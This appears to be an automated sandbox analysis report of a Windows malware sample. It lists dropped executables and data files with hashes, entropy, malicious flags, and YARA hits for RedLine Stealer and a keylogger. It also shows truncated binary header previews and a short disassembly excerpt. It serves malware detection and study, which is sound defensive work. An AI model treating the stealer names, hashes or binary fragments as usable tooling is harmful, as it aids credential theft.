                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000065001\stories.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):708608
                                                                          Entropy (8bit):6.51414217122021
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbQgUHayxyF:UQPh1eLSSKrPD37zzH2A6QD/srqggEQX
                                                                          MD5:C8AFA039FC2A7F032512686FB50692DF
                                                                          SHA1:3FCE9102949FA0FAC312574E6D3756F26735C000
                                                                          SHA-256:123E40B411BA32E768103090C2EB1C3B874F2C933F7E9F30717185B41F232332
                                                                          SHA-512:F185AA5A85570DD2172752D59278FD6B2B61DBA48890DEB48EC2803F3E3E10573CF600EE91F1AF1A77B56F2F44A52B16873BA5E6DF2D85C097C16D8EBAC98666
                                                                          Malicious:true
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2560
                                                                          Entropy (8bit):2.8818118453929262
                                                                          Encrypted:false
                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):6144
                                                                          Entropy (8bit):4.720366600008286
                                                                          Encrypted:false
                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23312
                                                                          Entropy (8bit):4.596242908851566
                                                                          Encrypted:false
                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2990472
                                                                          Entropy (8bit):6.459856200541649
                                                                          Encrypted:false
                                                                          SSDEEP:49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
                                                                          MD5:B826DD92D78EA2526E465A34324EBEEA
                                                                          SHA1:BF8A0093ACFD2EB93C102E1A5745FB080575372E
                                                                          SHA-256:7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
                                                                          SHA-512:1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2251
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:0158FE9CEAD91D1B027B795984737614
                                                                          SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                          SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                          SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                          Malicious:false
                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2251
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:0158FE9CEAD91D1B027B795984737614
                                                                          SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                          SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                          SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                          Malicious:false
                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2251
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:0158FE9CEAD91D1B027B795984737614
                                                                          SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                          SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                          SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                          Malicious:false
                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):986112
                                                                          Entropy (8bit):7.987134427472388
                                                                          Encrypted:false
                                                                          SSDEEP:24576:6MGVJ/Oap+Bh45LEwaV1QghDHm5GQTSmGg:6NJ/jpi5waVhjm5GQ2m7
                                                                          MD5:1EF39C8BC5799AA381FE093A1F2D532A
                                                                          SHA1:57EABB02A7C43C9682988227DD470734CC75EDB2
                                                                          SHA-256:0CCED5B50789FCA3AD4B2C151B798363D712DA04C377BD704DCEF4898E66B2B4
                                                                          SHA-512:13A9C267C4CEB2BD176F1339FAA035FFEB08936DEEEB4E38252EA43CFE487EA1C1876E4CC2A965548E767AF02805A1DA62885E6538DA056BE0C6FAE33B637682
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'1.f.............................!... ...@....@.. ....................................`.................................(!..W....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................d!......H.......P....G...........U.............................................."..(....*...>..(.....oV...&*.s.........*.0..........(.........(....o....3.(....-..j*~....%..(....~....o.......j@8...(......s.......o........&..o ...s!.........o".....,...i-....,...o#....($.....o%...o&...o#........(....(......(..........c.o'.......o'........c.o'.......c.o'.......o'........c.o'........c.o'........c.o'....o(......j....+)....o)...nX.....bX.....da.....o*......X......3....bX.....da.....bX....!.
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):311296
                                                                          Entropy (8bit):5.082543579488037
                                                                          Encrypted:false
                                                                          SSDEEP:3072:Oq6EgY6iYrUj1Np/wPG/2hIUrTA7tMSiy1cZqf7D34teqiOLibBOQ:1qY6i3wPtIUrTAxMY1cZqf7DIXL
                                                                          MD5:4E60F3FD76D9EAB244F9DC00F7765B0B
                                                                          SHA1:1A154D6E837E7105C551793131CDE89F157C4330
                                                                          SHA-256:D6945846CC23C01B9C9AD2B97D35B5A14C01F1A4CC2EC651A596F06777BA4FEC
                                                                          SHA-512:44727E25781F448579AC35AAB94AFF550ED9FE5AC58D95BD394569C62892DC78216AC687BAA43CEF66187EBE629F5DD9CD63EA274222D11DBEF3440EC4D7F77A
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, Author: Joe Security
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):364544
                                                                          Entropy (8bit):6.656062545289343
                                                                          Encrypted:false
                                                                          SSDEEP:6144:PJdHU1vR3RO5NSdLcHUPnAGrV1GdauIgmxmbsWeSI9ifLW3:PJS1vRhOfX0PA61Gig0mQY
                                                                          MD5:A3EF9920A91B891837705E46BB26DE17
                                                                          SHA1:9CFBCD0F46EC86FB57D3D6D74A064F9098ADF117
                                                                          SHA-256:171CEF885F6C285E995CE3EC5960C5EA4E4ED049CEC362745058FEE39E4136CC
                                                                          SHA-512:C65E91091B95C3ABA0AF7DF4ED6543D26BCB5B54D6FAB82F9D2AC1BA156F475F98124A1A0E8851D69BE23B1DC945C76C075CD32515203273260802E1224DBD6E
                                                                          Malicious:true
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....#.f..........................................@..........................P............@.....................................x................................J...................................................................................text...~........................... ..`.rdata...).......*..................@..@.data............b..................@....reloc...J.......L...D..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):55
                                                                          Entropy (8bit):4.306461250274409
                                                                          Encrypted:false
                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                          Malicious:false
                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):290
                                                                          Entropy (8bit):3.453776080602748
                                                                          Encrypted:false
                                                                          SSDEEP:6:Jw7ltX55ZsUEZ+lX1E5WEetFXqYEp5t/uy0lbqut0:Jw7lZuQ1HfXVvt0
                                                                          MD5:3D897888393B58E01F0A381F5C2E11EA
                                                                          SHA1:A06F551CA721F4DCBFBA94FC8B537E34539EBB69
                                                                          SHA-256:6B714EE18812371E986D09BA15E4AE5E3B6AA29DE3063D61478F0F3A0FE3BE94
                                                                          SHA-512:DF3479D8C13F44A7305B2D0EC70A9280DE0D44083F2F7B6E315100CC695AD70925896137D089DD81C0AF39061243E2DA8C4B29BBB6FBB6800D0460F887E8EEC4
                                                                          Malicious:false
                                                                          Preview:........*.9H...)E..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.5.4.f.d.c.5.f.7.0.\.H.k.b.s.s.e...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):3.437571363713282
                                                                          Encrypted:false
                                                                          SSDEEP:6:zgVX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lbkt0:URDQ1lOmeeDNfXVgt0
                                                                          MD5:3C865519CD8990EDB647637D7A553989
                                                                          SHA1:81F3EE752FDA82C464904C3EEECF48CAFC58F8C4
                                                                          SHA-256:20A712A5AAF1C72DEF6007AF7E20AAD83F7D80C7E5F5CB977828F08E65BEC501
                                                                          SHA-512:DB8D11AB868BE826691E67B9BF47CEC136538A4B81190329F7C84EC64307CCE353E6B0919FDFAD87C465D9838EAD3427AE6E7E28CA1BD8465BFF82663270472D
                                                                          Malicious:false
                                                                          Preview:....-.~....A...0..E.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe
                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):23
                                                                          Entropy (8bit):2.5600289361122233
                                                                          Encrypted:false
                                                                          SSDEEP:3:oWEMo6vvRya:oWEpKvD
                                                                          MD5:198AA7622D86723F12D39AA38A10C97F
                                                                          SHA1:B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
                                                                          SHA-256:88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
                                                                          SHA-512:8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
                                                                          Malicious:false
                                                                          Preview:012340..1..2..3..4.....
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.9495630479940464
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:file.exe
                                                                          File size:1'973'760 bytes
                                                                          MD5:49a9681922ad571a4a24b42465e5cdc4
                                                                          SHA1:f710153121bcde5e6acd4760001d916675973475
                                                                          SHA256:c66b9636df8b16d69170b47f28611d70194925cd941c0a7ed49a6f35a599dad6
                                                                          SHA512:adcb2e990a433e69468c21bc2f0089d147aad354bb3d637f280383f5d31913f4ad80a8c121a565a89b36946df0df02b142955681e257dd4bca66470146b976f3
                                                                          SSDEEP:49152:GJd564fdAN+fobpaJztfWOoh1jpt1zeO67:khgfb8tt/oNtcOI
                                                                          TLSH:7495335C0D1F3782CD0ADBF36DC96D83EB361485C6F6AFA1A2111EB74A3B1815186E1E
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x8e6000
                                                                          Entrypoint Section:.taggant
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                          Instruction
                                                                          jmp 00007F1F5085D01Ah
                                                                          paddb mm3, qword ptr [00000000h]
                                                                          add cl, ch
                                                                          add byte ptr [eax], ah
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [edx+ecx], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
